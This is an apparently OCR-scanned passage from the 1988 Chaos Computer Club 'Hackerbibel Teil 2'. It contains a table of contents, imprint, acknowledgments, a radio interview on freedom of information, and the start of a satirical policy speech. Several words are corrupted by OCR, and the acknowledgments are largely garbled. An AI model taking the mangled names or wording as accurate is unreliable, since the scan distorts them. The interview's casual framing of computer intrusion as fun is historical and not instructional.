Ws^
CHAOS COMPUTER CLUB
6111 ep/
HACKER BIBEL 2
DAS NEUE fESTAMENf
Q
\aMa/
HUnniiE SOFTURRE FÜR HERZ. HRHO B RIRü
DER GRÜNE ZWEIG I24
. Inhack
10 Daten raus - umsonst und sofort
12 Bericht zur Lage der Nation
17 Chaos Talks
23 eVorstöndliche Abmahnung wg. Schaum
29 Indianerspielzu Ende
31 Daten - Aufzucht und Pflege
35 Funkbastler 1936
42 Geburtstag: 40 Jahre Transistor
44 Parlakom schachmatt
46 Liebeskranker Roboter 1932
47 Technik in die Schranken (Weizenbaum-Interview)
52 WELL - ein guter Datenbrunnen
54 Soviet Computer Technology
59 Minus Delta Talks
78 Freedom of Data Processing
84 Phonetapping
86 Geht den Damen ein Licht auf?
89 Interview mit Deborah L Brecher
91 Computer Lib
92 Ein positives feministisches Modell
94 Ich hob auf DV-Fachfrau umgeschult
96 Ein Mailboxbetreiber erzählt
106 Elektronische Roll-Nomaden
110 Batch-Magic
114 Fun, Profit and Global Suicide
116 Tabellen: Satelliten-Info von Info-Sat
122 Telcom-History 1966
123 Strahlende Computer
126 Sachverständige Äußerung
128 Programmiererdoping
130 Babyboomers and Cyberpunks
134 Megabrain
140 Datenschleudern von 13 bis 25 - nachdrücklich empfohlen
disiM
ab:
13
14
15
16
17
18
19
20
21
22
23
24
25
140 Datenschleudern von 13 bis 25 — nachdrücklich empfohlen
141 Hacker im Europaparlament
144 Heyne Halbschnellschuß (Buchrezension)
144 COSY (Cursor Operating System)
145 Die Katze darf das!
146 Wohin steuert die Welt7(wolstderAbfluB?ciSä)
146 Chaos Communication Congress
147 The Kids Can't WaitI
150 Viromat plus
150 Telecontrol - wie geht das7 (mit ’ner Ferr^euetung; d. Säzzer)
151 Trara - die Post ist da! (hoch aufdem gelben Wagen dSä)
151 Kinder sind Chaoten
153 2. Wirtschaftskriminalitätsgesetz (Forts. 16:163)
157 Mailboxen sind nicht totzukriegen
158 Hackers von Steven Levy
168 Buchwarnung: M3DOS im Detail
159 Btx-Kostensteigerung; Btx für C—64 und BIM
1 59 Hilfe, Hacker (oh Big BrotherdSä)
160 Security against Hackers (gipsnichdSä)
161 Satzung des Chaos Computer Club eV
162 EARN / BitNet runtergefahren7!
162 Mailbox und Btx
167 CCC - Partner auf dem Weg zur Informationsgesellschaft (ötB)
169 Virus RushHour
170 Laserbrief & Antwort (Stichwort Elite etc.)
1 71 Strahlengefahr aus dem Telefon7 (auch 17:177)
1 72 Entwicklungshilfe: Chaos-Dienstreise nach Graz
173 Postmodemballade
176 Datex-P: Auslösung (Auflösung?! dSö)
177 Virusartikel in fünf Teilen aber einer Ausgabe
182 Volkszählungsreanonymisierung (auch 18:187)
183 Fake-Bombe auf dem Chaos Communication Congress
191 Artware
192 waschmaschinenfester Personalausweis
194 GfA-Basic Prüfsummenprogramm für waschmaschinenfesten
196 Erbsubstanz in der Rasterfahndung
177' Der magische Schalter
198 Real Programmer's don't use PASCAL(f 2 i: 208 , 22 ; 2 i 9 )
200 Datenbankkontrolle in USA
203 Die Quatschexplosion (Lesehitfezu 22 : 212 )
208 Rechtliche Aspekte von Computerviren
213 SPANet
214 Die Knust und ihre Knüstler: documenta 8 (vgi. 22 : 216 )
215 Telex via Btx
216 Btx-Softwaredekoder für PC 's
218 Brief aus Kairo (sehr versandet dSä)
223 Bits, Bugs und Vaxen
224 Die aktuellen Tarife für's Hacken (s. 24:241)
231 Raubkopien (s. 24:242)
236 NASA, BkA, Betrachtungen
239 Schmelzfeste Schokolade (Boupiäneabgestü4er Ufos)
243 Computerbetrug am Automaten
244 Münzprüfer (draufbelßen.dSö)
248 VAX-Encryption
249 Geheime Nachrichtentechnik und privater Nachrichtenschutz
251 EARN: Erstes Außerirdisches Regional Netz
252 Modemanschluß
253 Argentinische Hacker
Impressum
Die Hackerbibel Teil 2
Der grüne Zweig 124
Redaktion: Werner Pieper und Henvart Holland-Moritz
Redaktion Daienschleuder
Schwenckestraße SS
D-2000 Hamburg 13
Datex-P: Geol ;Chaos-Team
BTX:“Chaos
Satz:Bu(dimaschine Heidelberg und WYSIWYG
Gestaltung: Ronald Rippchen & Wau
Illustrationen: Wenn nichtanders angegeben Chaos Realitätsdienst
Covergestaitung vorn: Maii & Werner
Druck: Fuldaer Verlagsgesellschaft
Herausgegeben von Herwart Holland - Moritz
Verlegt von der Grünen Kraft - Medienexperimente
Werner Pieper - D - 6941 Löhrbach
ISBN 3-925817-24-7
Die in diesem Buch veröffentiichten Beiträge sind urheberrechtlioh geschützt. Alle Rechte, insbesondere das der Übersetzung in fremde Sprechen, Vorbehalten K ■
Teil dieses Buches darf ohne schriftliche Gehnehmigung des Verlages in irgendeiner Form - durch Fotokopie, Mikrofilm oder andere Verfahren - reproduziert oder
eine von Maschinen, insbesondere von Datenverarbeitungsanlagen, verwendete Sprache übersetzt werden. ^ 'h
Auch die Rechte der Wiedergabe durch Vortrag, Funk- und Fernsehsendungen, im Magnettonverfahren oder ähnlichen Wege bleibt Vorbehalten.
Fotokopien für den persönlichen und sonstigen Gebrauch dürfen nur von einzelnen Beiträgen oder Teilen daraus nur als Einzelkopien hergestellt werden. Jede im
Bereich eines gewerbicihen Unternehmens hergestellte oder benützte Kopie dient gewerblichen Zwecken gern § 54 (2) UrhG und verpflichtet zur Gebührenzahlun
an die VG WORT, Abteilung Wissenschaft, Goetherstraße 49, D-8000 München 2, von der die einzelnen Zahlungsmodalitäten zu erfragen sind. ®
Für elektronische Informationssysteme (Mailboxen usw.) gelten grundsätzlich unsere in GEONET veröffentlicheten Verbreitungsbedingungen.
Bei Erwerb, Errichtung und Betrieb von Empfängern, Funksprechgeräten, drahtlosen Mikrofonen und anderen Funkanlagen, sowie Telefonen und
Datenübertragungsgeräten und - nicht zu vergessen - Computern, insbesondere bei Eingriffen in das Postnetz in der Bundesrepublik Deutschland sind die oelterri»
gesetzlichen und postalischen Bestimmungen zu beachten. ’
Für Bauanleitungen, Schaltungen und Programme in der Hackerbibel Teil 2 zeichnen die Verfasser bzw. Entwickler verantwortlich. Die Redaktion hat die
Manuskripte, Schaltungen und Programme mit gröQter Sorgfalt (auch juristisch) geprüft, kann aber für Fehler im Text, in Schaltbildern, Aulbauskizzen Stücklisten
Programm-Listings usw., die zum Nichtfunktionieren oder evtl, zum Schadhaftwerden von Bauelementen, Anwendern sowie toter und lebender Materie'führen weder
eine juristische Verantwortung noch irgendeine Haftung übernehmen.
Sämtliche Veröffentlichungen in der Hackerbibel Teil 2 erfolgen ohne Berücksichtigung eines eventuellen Patentschutzes, auch werden Warennamen ohne
Gewährleistung einer freien Verwendung benützl.
impress.bm
Vonuörter, 9{gtfi7Veise
und ‘Danf^sagunßen
‘trotz der nun schon ktiapp ein Jahr andauernden unverständCichen ‘Be-
scfdoßncdimunßen von redafctionedem. 9dateriaC von datenschCeuder und Jdah:
herhiSeC konnte dieses Werhi jetzt — wenn auch verspätet — fertißßesteCCt
werden.
ZucdCererst ßiCt unser (Dank^ den J^reundlnnen des Chaos Computer CCuB,
ohne die der JdaBi zweiter ‘TeiC so nicht hätte vollendet werden können.
Qpasi stellvertretend erwähnt sei iHerr Äckermann, dessen Juristische Bei¬
träge — gerade zur ‘Virendiskussion — in verschiedene ‘Datenschleuder-Är-
tikel eingingen, ohne daß er korrekt namentlich genannt wurde.
‘Weiter danken wir der Zeitschrift ‘Whole Barth B^'Oieu) (27 Qate S
‘Rpad, Sausalito, CÄ 9496S ‘ILSÄ) sowie dem Besten Buchkgtalog der ‘Welt,
Loompanics (Bßtalog c/o üdedieneT^perimente, 6941 LöhrBach) für permanen¬
te Inspiration.
‘Die taz sorgte für üBerraschende LkhtBlicke - gerade auf der Ifrauen-
seite — und aus vielen weiteren Quellen lourde mit freundlicher Qenehmi-
gung geschöpft.
‘Wir danken Jlerm Schumacher unBekannterweise; für Interviews mit ^liss
dem ‘P9d-Computerheft, mit ‘WeizenBaum Info 3, mit ‘Timothy Leary Bplling
Stone; ‘Eva Blumenfeld und päd.eKtr(t pBus demokratische erziehung, Udagkal
Blend und Odichael Jüitchinson für üdegoBrain-Infos, Infosat — dem 9daga-
zin für den freien SÄ‘T-‘TV-'Empfang, Trofessor 9dolzBerger von der Univer¬
sität der Bundeswehr und Carola Schewe (deren ‘Ergänzungen zu .Strahlen¬
de Computer“ leider zu spät kamen) und nicht zuletzt Michael Qreen für
die UmscfdaginnenBilder aus dem wunderschönen Buch „The Zen Ärt cf
Macintosh".
OBwohl ‘Verleger und JlerausgeBer sich nachdrücklich Bemüht haBen, die
erforderliche MgchidruckerlauBnis edler zitierten ‘Werke und Benutzten äBBU-
dungen einzuholen, ist es uns nicht gelungen, alle B^hteinhaBerlnnen aus¬
findig zu machen. Sofern diese uns davon in E/nntnis setzen, werden wir
sie selBstverständlich gerne in zukpiftigen Äuflagen als J(echteinhaBerInnen
geBührend ausweisen.
LöhrBach / MeidelBerg, Juli 1988
Daten raus - umsonst und sofort
Zwei Stunden lang kommen täglich von 10 bis 12 auf SDR3 interessante
Leute zu Wort wie der Hamburger Sexualwissenschaftler Wawerzonnek
mit seiner These vom,,multiplen Orgasmus“. Am 4. Juni 1988 waren vom
CCC Andy aus Hamburg und Bernd aus Heidelberg zu Gast bei Moderator
Stefan Silier. In der zweiten Stunde ging es um social hacking.
M: Andy und Bernd, ihr gehöil zum Chaos Computer Club.
Dieser Club macht unter anderem dadurch Schlagzeilen,
daß er so etwas wie das Eindringen in die NASA-Computer
an die Öffentlichkeit bringt. Macht ihr das, um der NASA zu
helfen? Paßt mal da auf, daß das nicht wieder passiert?
A: Da gibt es unterschiedliche Motivationen. Einmal gibt es
die Motivation des Hackers, der macht das aus Spaß. Es ist
natürlich auch ein Machtgefühl, wenn man mit seinem 500
Marks-Heimcomputer im Wohnzimmer sitzt und weiß, in den
Staaten steht irgendwo ein Rechner und da ist man jetzt
drin, da bewegt man jetzt auf einer Platine ein paar Bits
umher. Das ist schon ein Wahnsinnsgefyhl. Unsere Moti¬
vation, Schwachsteilen aufzudecken bringt uns auch Pro¬
bleme. Uns wird auch vorgeworfen, dieTrütfelschweineder
Software-Industrie zu sein, unter dem Motto; Wir nutzen
unser Wissen aus, um die Welt dicht zu machen. Da müssen
wirdifferenzieren; Wir wollen jetzt nicht irgendwie die totale
Zugangskontrolle. Wir setzen einen ganz klaren Unter¬
schied zwischen den Datenbereichen zum Beispiel des
Militärs, die wie wir meinen, geschützt sein müssen. Auf der
anderen Seite gibt es die Datenbanken, die für jedermann
zugänglich sein sollten. Da fordern wir weltweiten freien
Informationsfluß.
M; Zu welchen Datenbanken zum Beispiel?
A: Da gibt es viel Forschung, zum Beispiel Bioforschung.
M; Von privaten Firmen?
A: Von privaten Firmen, aber nicht nur. Auch von staatlicher
Seite.
M: Die sagen natürlich: Wir stecken unser Geld da rein, das
ist unsers.
A; Für die staatliche Seite haben wir das so formuliert: Wir
fordern die maschinenlesbare Regierung. Mit Hilfe derCom-
puter und der Netzwerke ist so was einfach möglich. Da¬
durch ist es möglich, Daten transparent zu machen. Diese
Technologie existiert dazu. Es ist nur die Frage, wie sie
eingesetzt wird.
B: In dieser Beziehung sind die Bundesrepublik oder große
Teile von Europa wirklich noch Entwicklungsland. Seit1974
gibt es in Amerika das ,,Freedom of Information Act“, das
jeder Person in den USA erlaubt, Daten, die von der Öf¬
fentlichkeit in Regierungsstellen fließen, auch wieder ab¬
zufordern. Das beinhaltet Volkszählungsdaten, das bein¬
haltet aber auch Observationen. In den USA ist es sogarso,
daß wenn man observiert wird und es mitbekommt, wie das
bei der Joan Baez mal der Fall war, daß sie ihr gesamtes
Dossier auf Grund des ,,Freedom of Information Act“ vom
CIA zurückfordern konnte und daß ein Recht auf Einsicht in
Umweltakten besteht. Es wird ja auch hier in der Bundes¬
republik registriert, welche Firmen weiche Stoffe wo ein¬
leiten und mit welcher Berechtigung. Diese Daten werden
uns vorenthalten. Und der Ansatz, der jetzt mittlerweile auch
von den Grünen und von derSPD gefordert wird, ist ein guter
Ansatz, nämlich Einsicht in die Umweltakten. Es ist ja ganz
klar: Handeln tut man auf Grund von Informationen; wer
keine Informationen über die Welt hat, ist nicht In der
Lage, ln dieser Welt richtig zu agieren. Insofern ist es in
einer Demokratie unumgänglich, daß alle Daten, die von der
Regierung produziert oder von der Regierung gesammelt
werden, der Öffentlichkeit auch wieder zugänglich gemacht
werden.
M: Aber das ist ein sehr zweischneidiges Schwert. Bei
manchen Daten kann ich mir vorstellen, daß es sinnvoll ist,
wenn die Öffentlichkeit, wenn jeder Zugang zu diesen Daten
hat. Bei anderen würde ich doch sehr den Datenschutz in
den Vordergrund stellen.
A: Das sagen wir ja auch vollkommen klar. Wir fordern ja
auch überhaupt nicht, daß zum Beispiel der militärische
Abschirmdienst alleDaten, die er hat, auf den Tisch legt.
M: Meine persönlichen Daten sind ja auch was weiß ich
üloerail gespeichert - bis zur Krankenkasse. Da will Ich doch
nicht, daß irgendjemand, der zufällig in dieses System
reinkommt, erfährt, wann ich an welcher Krankheit gelitten
habe.. .
A: Richtig, das ist vollkommen verständlich. Da setzen wir
uns auch gar nicht dafür ein, daß diese Daten nun jeder
bekommt. Aber im Moment ist es so, daß eigentlich alles
gesichert wird - und das auch mehr schlecht als recht- und
das ist, meinen wir, nicht der richtige Weg.
B: Man kann es ganz einfach definieren: Die Daten, die die
Öffentlichkeit betreffen, müssen auch der Öffentlichkeit
zugänglich gemacht werden. Wenn jetzt jemand sagt, er
muß eine neue Umgehungsstraße bauen aus den und den
Gründen, weil sich das zum Beispiel aus der Volkszählung
ergibt, dann muß es doch auch möglich sein, daß diese
Daten, auf Grund derer Regierungsentscheidungen ge¬
troffenwerden, nachprüfbar sind. Diese Nachprüfbarkeit
ist ein wesentliches Element der Demokratie und un¬
serer freiheitlich demokratischen Grundordnung, daß Re¬
gierungsentscheidungen kontrollierbar sein müssen.
M: Aber das ist ja jetzt nichts, was sich jetzt erst durch das
Computerzeitalter ergeben hätte. Man könnte die Regie¬
rung ja auch dazu verpflichten, das in irgendeinem Buchzu
veröffentlichen, ansonsten steht jeder ohne einen Com¬
puter außen vor.
A: Das ist richtig, aber die Entwicklung weist ja in Richtung
elektronische Medien. Zum Beispiel: Die Bundesregierung
ist auch Anbieterin im BTX-System. Und was sie da an
Informationen bietet, ist - ich sag jetzt mal meine Meinung
-eine Frechheit. Da kommt eigentlich nichts rüber, obwohl
im Bildschirmtext die Möglichkeit besteht, daß jeder Bürger,
der an dieses Bildschirmtextsystem angeschlossen ist, In¬
formationen über irgendwelche Verhandlungen bekommt.
Die technischen Voraussetzungen sind da und manchmal
nicht da. Insofern ist es schon verständlich, aber auf Pa¬
piermedium ist das alles kompliziert und vor allem teuer.
Aber auf den elektronischen Medien ist das sehr einfach,
sehr billig und es könnte eingesetzt werden.
M: Aber nicht demokratisch, weil nicht jederso ein Ding hat.
B: Da wollt ichgrad noch mal drauf eingehen. Wir sind daran
gewöhnt, daß es überall diese kleinen gelben Häuschen
gibt, in denen man telefonieren kann. Wieso ist es so
unvorstellbar, daß es gelbe Häuschen mit einem Computer
drin gibt, wo man seine 5 Mark oder wieviel auch immer
reinwirft, und dann die Möglichkeit hat, auf die Daten zu¬
zugreifen. Man muß ja den Computer nicht selbst besitzen.
A: Das wollen wir an dieser Stelle auch mal klarsfeilen: Wir
sind für eine Verkabelung der Welt. Aber über das Wie und
Warum müssen wir uns noch mal unterhalten.
M: Ihr habt eben gesagt, wir fordern die Verkabelung der
Welt. Unabhängig davon, ob ihr das fordert, wird es dazu
kommen - der Weg dort hin ist wohl vorgegeben. Aber das
eröffnet ja nun auch vielen unangenehmen Begleiter¬
scheinungen Tor und Tür, wie zum Beispiel Wirtschafts¬
kriminalität. Auf 15 Milliarden schätzt man jetzt schon den
jährlichen Schaden. Und je mehr Leute sich ins Kabel
hängen, desto größer ist die Wahrscheinlichkeit, daß ma¬
nipuliert wird. Wir haben von dem Börsenmakler bei VW
gehört, das ist ja auch über den Computer gelaufen. Läßt
sich sowas nicht verhindern, wenn die Sicherungen mal so
gut werden, daß sowas nicht mehr passiert?
B: Dies ist meiner Meinung nach einfach unwahrscheinlich,
weil die Systeme von Menschen konzipiert werden, von
Menschen betrieben werden und damit ganz einfach vom
Prinzip her nicht sicher gemacht werden können. Das ist
aber auch gar nicht so sehr der Ansatzpunkt. Wenn wir wie
Andy vorhin, von der Verkabelung der Welt reden, meinen
wir damit nicht so sehr, daß sich alle Wirtschaftsunterneh¬
men verkabeln, sondern wir haben eine ganz andere Per¬
spektive, daß nämlich die Linken, sage ich jetzt mal so
generell, sich eher technikfeindlich verhalten und es nicht
begreifen, daß Computer für sie ein Medium sein können,
das sie sehr sinnvoll einsetzen können. Um mal einer!
Begriff von Robert Jungk zu benutzen; Wir sind im Chaos
Computer Ciub eine Zukunftswerkstatt. Wir denken über
die Zukunft nach, über das, was man machen kann, um die
Zukunft lebenswert zu gestalten. Und mittlerweile - zum
Glück, kann man da sagen - begreifen auch die Bürgeri¬
nitiativen, daß sie Computer einsetzen können für ihre
eigenen Zwecke. Es gibt heute beispielsweise schon
computer-überwachte Atomanlagen, wo die Bürgerinitiati¬
ven Meßgeräte aufbauen, die Daten sammeln und dann
über Computer weitergeben. Und die Idee, die jetzt in
München geboren wurde, ist, daß man alle Bürgerinitiati¬
ven, die sich mit Umweltschutz beschäftigen, miteinander
vernetzt. Dazu muß man sagen: so positiv dieser Ansatz
eigentlich ist, so verkennt er doch, was ein Computernet¬
zwerk ist. Der Computer im Netzwerk ist ein Strukturver¬
stärker, so will ich das mal nennen. Das heißt, er verstärkt
eigentlich nur vorhandene Sozialstrukturen. Wenn Leute,
die in ganz verschiedenen Städten sitzen, schon so nicht
miteinander auskommen und nicht miteinander reden kön¬
nen, dann werden sie das mit dem Computer noch viel
weniger können und es wird in die Katastrophe führen.
Insofern muß, bevor da ein gutfunktionierendes und effi¬
zientes Computernetz installiert wer den kann, zuerst die
notwendige Sozialstruktur geschaffen werden, damit die
Leute dann auch in der Lage sind, den Computer sinnvoll zu
nutzen. Das ist überhaupt ein generelles Problem, daß
meiner Meinung nach in der Gesellschaft mit dem Computer
so viel falsch läuft, weil der Computer sozusagen vorhan¬
dene Strukturen bei uns in der Gesellschaft verstärkt und -
das muß man schon so sagen - das sind nicht immer sehr
glückliche Strukturen. Wenn es darum geht, viel Geld zu
verdienen und diese Struktur in der Gesellschaft da ist, dann
verstärkt das der Computer und provoziert natürlich sowas
wie Computerkriminalität.
M: Im Moment noch kein sehr demokratisches Instrument,
der Computer.
A; Ein Computer ist weder demokratisch noch undemo¬
kratisch. ..
M; Die Anwendung des Computers fördert im Moment
noch nicht die Demokratie.
A; Ich will jetzt nicht anfangen, von der Regierung zu reden,
aber was da eingesetzt wird bezogen auf die Offenheit
gegenüber den Bürgern, kann man so sehen.
B: Die Struktur ist nicht dafür geeignet, daß der Computer
wirklich demokratisch förderlich wäre. Es geht also zuerst
darum, das Vorfeld zu bereiten, damit Computer für diese
grundsätzlich demokratische Aufgabe genutzt werden kön¬
nen.
M: Du hast eben konkrete Projekte angesprochen, die jetzt
unter den sogenannten Linken laufen, bei Umweltschutz¬
verbänden. Versteht sich euer Blättchen, die Daten¬
schleuder, auch als Medium für diese Projekte?
B: Es heißt ja, die Datenschleudeic ist das wissenschaftliche
Fachblatt für Datenreisende. Und in dem Sinne verstehen
wir uns als Wissenschaftler. Wissenschaftler wird man
nicht dadurch, daß man an irgendeiner Universität
Irgendeinen Abschluß macht, sondern Wissenschaftler
ist der, der sich kompetent zu Sachen äußern kann.
Dieses Wissen wollen wir sinnvoll einbringen und dazu
benutzen wir verschiedene Medien. Das ist zum einen die
Datenschleuder, die erscheint unregelmäßig. ..
A:.. .in Papierform. Das ist auch wichtig. Leute, die da nicht
irgendwie mit ihrem Computer was machen, denen das
auch zugänglich zu machen. Die Datenschleuder versteht
sich auch nicht so sehr als Fachblatt in dem Sinne, daß da
die neusten technischen Dödelfazzes ausgetauscht wer¬
den, sondern als Informationsblatt über - na sagen wir mal
- den Stand der Entwicklung oder so.
B: Dann gibt es noch zusammenfassend die Hackerbibel -
die erste Bibel mit Fortsetzung, der zweite Teil wird vor¬
aussichtlich zur Buchmesse verfügbar sein -, das ist eine
Zusammenfassung von dem, was wir machen. Das ist nicht
so sehr die Zukunftsperspektive, sondern „state of the art“,
darzustellen, wie weit wir im Moment sind.
(Und dann war die Sendezeit leider um...
Für die Hackerbibel Teil 2 wurde obiges, leicht redigiertes
Gesprächsprotokoll angefertigt)
Dieter Schumacher
Bericht zur Lage der Nation
im geteilten FIZ-Deutschland
Abstract
Es ist nicht genug zu wissen, man muß auch an wenden;
es ist nicht genug zu wollen, man muß auch tun.
jQhann{W)Wolfgang(W)Goethe
Herr Präsident, Herr Bibliotheksdirektor,
Verehrte Körperschaften, Persönlichkeiten und Ministerialräte,
Vertreter der Geistlichkeit und ideologieverwandter Berufe,
Eminenzen, Resistoren, Impedanzen und Suszeptibilitäten,
Rote und Schwarze, Realos und Fundis,
Ruhegehaltsfähige Mitbürger und sonstige Beihilfeempfänger,
Mittelständler und Existenzgründer,
Liebe Online-Gemeinde!
Unsere diesjährige ökumenische Feierstunde für Kommerzielle und Nichtkommerzielle steht wie¬
der unter einem Wort des Herrn (Helmut Kohl), der uns am 18.3.1987 in seiner Regierungserklä¬
rung zurief: Die Schöpfung bewahren - die Zukunft gewinnen - Online recherchieren!
Die Epistel des heutigen Tages steht geschrieben in Joh. 1,1:1m Anfang war das Paßwort, und
das Paßwort war beim Host.
Die Kollekte am Ausgang ist bestimmt für die Hinterbliebenen derjenigen vom BMFT geför¬
derten IVS-Neugründungen, die nach Ablauf des Förderungszeitraums noch keine schwarzen
Zahlen schreiben. Sie wird der Liebe der Gemeinde empfohlen.
Dieser erste Bericht nach der Winterwahl des Jahres 1987 steht noch ganz unter den Nachwir¬
kungen der Regierungsbildung und des mühsamen Ausklammerns echter inhaltlicher Aussagen
in den Koalitionsvereinbarungen.
Während die Spitzensteuersätze und die Sicherheitsgesetze heftig umstritten waren, bestand
Konsens darin, das laufende luD-Programm 85-88 über 1988 hinaus um weitere 4 Jahre zu ver¬
längern und eine Fortschreibung erst in der nächsten Legislaturperiode vorzusehen. Es sei - so
die einhellige Meinung der Verhandlungspartner - damals meisterhaft so ausgewogen ausformu¬
liert worden, daß der überwiegende Teil der inhaltlichen Aussagen auch bis in die frühen 90er
Jahre noch Bestand haben dürfte, auch bei dann veränderten Randbedingungen.
Es sei auch der Beamtenschaft des Bundes und der Länder nicht zuzumuten, nun in Kürze
schon wieder den Streß einer derartigen Konsensbildungsstrapaze auf sich zu nehmen, zumal
sie vorerst auch noch für produktive Tätigkeiten zur Verfügung stehen müßten. Bis 1992 seien die
zuständigen Damen und Herren dann hinreichend regeneriert und befördert, daß sie mit neuem
Elan an das luD-Programm zur Jahrhundertwende gehen könnten. Auch der bisher zuständige
verdienstvolle beamtete Staatssekretär wurde vorsorglich in den einstweiligen Ruhestand ver¬
setzt, damit seine luD-orientierte Dynamik diese Zeitpläne nicht unterwandert und damit er sich
seinerseits ohne die Last des politischen Tagesgeschäfts auf die dann anstehenden Aufgaben
konzeptionell vorbereiten kann.
Für eine Fortschreibung erst Anfang der 90er Jahre sprach auch der Umstand, daß dann die
aktuellen Bevölkerungsdaten aus der jetzt laufenden Volkszählung auf den Tisch liegen, daß die
Spätfolgen des Pillenknicks überschaubar werden und daß der Bundesminister für Wirtschaft
seine Grundsatzüberlegungen abgeschlossen hat, so daß dann Bedarfsuntersuchungen auf
gesicherter Grundlage erstellt werden können, für welche die nachgeordneten Institute bereits
heute Personal Vorhalten.
Im Bereich der inneren Sicherheit soll einvemehmlich ein Vermummungsverbot beim Recher¬
chieren erlassen werden; die Koalitionäre sind der Ansicht, man solle nicht länger seine Freude
über gefundene Hits der Öffentlichkeit vorenthalten. Eine Novellierung des Bundesdatenschutz¬
gesetzes und des Verwaltungsverfahrensgesetzes soll auf Wunsch von Minister Zimmermann
die Zusammenarbeit zwischen den FIZen und den Sicherheitsorganen verbessern; er verspricht
sich von einer Überwachung der Recherchenthemen Hinweise auf recherchierende Verfassungs¬
gegner. Schließiich wird das Gesetz über den militärischen Abschirmdienst sicherstelien, daß
Ostblocksearcher bei uns keine SDI-Profiie plazieren.
Der Bundesminister für Justiz mußte entgegen früheren Plänen im Amt bleiben, da er immer
noch nicht den Eingangsdialog zu JURIS beherrscht, geschweige denn die Markteinführung.
Ferner konnte die rechtzeitig vor der letzten Landtagswahl angekündigte Sitzung der JURIS
GmbH nach Saarbrücken noch nicht vollzogen werden. Man hebt sich das jetzt für die nächste
Wahl auf, um dann Anlaß für eine schöne pressewirksame Eröffnungsveranstaltung zu haben.
Mittelbar davon betroffen ist auch der weiterhin mit Spannung erwartete Termin für den
Besuch des Staatsoberhaupts der Deutschen Demokratischen Republik: Herr Honecker möchte
im Saarland nämlich auch einen Blick in JURIS tun und sich einmal online veranschaulichen, was
einen Rechtsstaat ausmacht.
Auch der Bundesminister für Wirtschaft mußte aus luD-Gründen im Amt bleiben, weil die
von ihm seinerzeit vergebenen luD-Studien nun noch erst implementiert werden müssen. Immer¬
hin hat er mit diesen Studien erreicht, daß die damit beauftragten, ihm nachgeordneten Institute
mittlerweile Grundkenntnisse im Recherchieren erwerben konnten. Die Erhebungen der Institute
bei den sachkundigen Privatfirmen haben dort zu einem Verdienstausfall von einigen 10.000 DM
geführt, die steuerlich nicht als außergewöhnliche Belastungen abgesetzt werden können.
Wie rasch der BMWi Studienerkenntnisse in Maßnahmen umsetzt, zeigt sich im Bereich der
Informationsversorgung mittelständischer Unternehmen: Kaum hatte er erfahren, daß Mittel¬
ständler Informationen lieber am Stammtisch als am Terminal einholen, wurde der Beschluß
gefaßt, den IVS des BMFT ein bundesweites Netz von Searchkneipen entgegenzusetzen. Dort
sitzt während der Öffnungszeiten ein FIZ-Mitarbeiter mit Portable am Tresen und reicht Online-
Records mit Pils oder Alt. Die Fakultät für Brauereiwesen der TU München in Weihenstephan
erstellt derzeit die obligate Bedarfsanalyse. Hoppenstedt reagiert sensibel auf diese Markt¬
chance und bringt eine Kundenzeitschrift heraus unter dem Titel “Cogito, ergo bibamus”.
Im Geschäftsbericht des BMZ wurde dem deutschen Volk abermals ein Minister zugemutet,
der die Datenbanken SCAN-A-BID und CAB nicht kennt. Minister Klein feistete freilich zunächst
einmal Entwicklungshilfe im Inland südlich des GOLEM-Äquators: Ein schon vom BMWi mit Fort¬
bildungsstudien betrautes Wirtschaftsforschungsinstitut in München erhielt nun auch noch ent¬
geltlich Gelegenheit, sich über Datenbanken mit Entwicklungsländerrelevanz sachkundig zu
machen.
Anders als der BMWi verfügte der BMZ jedoch zunächst eine öffentliche Ausschreibung, um
bei den Insidern im Wege der kostenlosen Angebote Anregungen für die inhaltliche Ausgestal¬
tung der Studie einzuholen. In seinem Amtseifer ist es freilich dem Minister entgangen, daß bei
einer Ausschreibung nach VOL nach herrschender Lehre keine gemeinnützigen Auftragnehmer
bedacht werden dürfen.
Derartigen fortgesetzten grob unbilligen Wettbewerbsverzerrungen zwischen öffentlichen und
privaten Anbietern will der Bundesminister der Finanzen nunmehr einen Riegel vorschieben:
Künftig wird nur noch unterschieden zwischen kommerzieilen Anbietern 1, Art (öffentliche und
gemeinnützige Institute, die keine Ahnung von Gemeinkosten haben) und solchen 2. Art, die ehr¬
lich ihre Kosten ermitteln. Erstere erhalten bei Ausschreibungen pauschal einen Angebotszu¬
schlag von 80%.
Nicht nur Minister Klein, sondern auch Rita Süßmuth zeigt eine zunehmende Sensibilität
gegenüber Oniine-Diensten: Den zahlreichen Pfeifenrauchern in der Online-Szene hat sie ein
sogenanntes Raucherterminal angekündigt, mit eingebautem Aschenbecher und Dunstabzugs¬
haube. Mit diesem Equipment wird einerseits den Pipe Searchern die Lust am Recherchieren
erhalten, während andererseits die nikotinarmen Rechercheure frei von Umweltbelastungen
ihrem Gewerbe nachgehen können.
Sie legte ferner einen Bericht des Bundesgesundheitsamtes vor, wonach die in Onlinekreisen
weit verbreiteten Search Aids unter epidemiologischen Gesichtspunkten unbedenklich sind.
Diese Aids-Form kann zwar bei weniger robusten Searchern zu einer gewissen immunschwäche
gegen bestimmte Hosts führen. Es besteht jedoch kein öffentliches Interesse daran, diesen Per¬
sonenkreis dagegen amtlich zu schützen. Unbeschadet dessen werden sich künftig Searcher im
Freistaat Bayern, sofern sie im öffentlichen Dienst beschäftigt sind, regelmäßig Aids-Reihen-
untersuchungen unterziehen müssen.
Der Bundesminister für Forschung und Technologie nutzt die schöpferische Pause zwi-
sehen zwei luD-Programmen zur Verbesserung der luD-Rahmenbedingungen sowie zur Schaf¬
fung symbolträchtiger und marktfördernder Infrastruktureinrichtungen; Nachdem Pläne mißlun¬
gen waren, die GID FÜR 1 DM an einen Berliner Brotfabrikanten zu veräußern, wurden mittler¬
weile andere potente Anteilseigner gefunden, denen der Einstieg in die Gesellschaft durch außer¬
ordentliche Erträge auf Zeit geebnet wurde. Nun ist man dabei zu klären, mit welchen Aufgaben
dieses Spezialistenteam betraut wird.
Die wirtschaftliche Stellung privater Informationsvermittler soll durch ein Berufsmonopol
abgesichert werden, ähnlich wie sich auch bereits die Arbeitsämter, Ärzte, Anwälte und Apothe¬
ker vor unliebsamer Konkurrenz schützen. Danach soll Informationsvermittlung nur der betreiben
dürfen, der von einer Industrie- und Handelskammer als qualifiziert angesehen und insoweit ver¬
eidigt wird.
Die Bonner Bannmeile um das Bundeshaus herum soll zu einer IVS-freien Zone erklärt wer¬
den, da in diesem Umkreis ohnehin niemand Online-Dienste nutzt und eine IVS-Aktivität die
Beamten und Parlamentarier nur stören würde. Auch im neuen Deutschen Bundestag sitzt wie¬
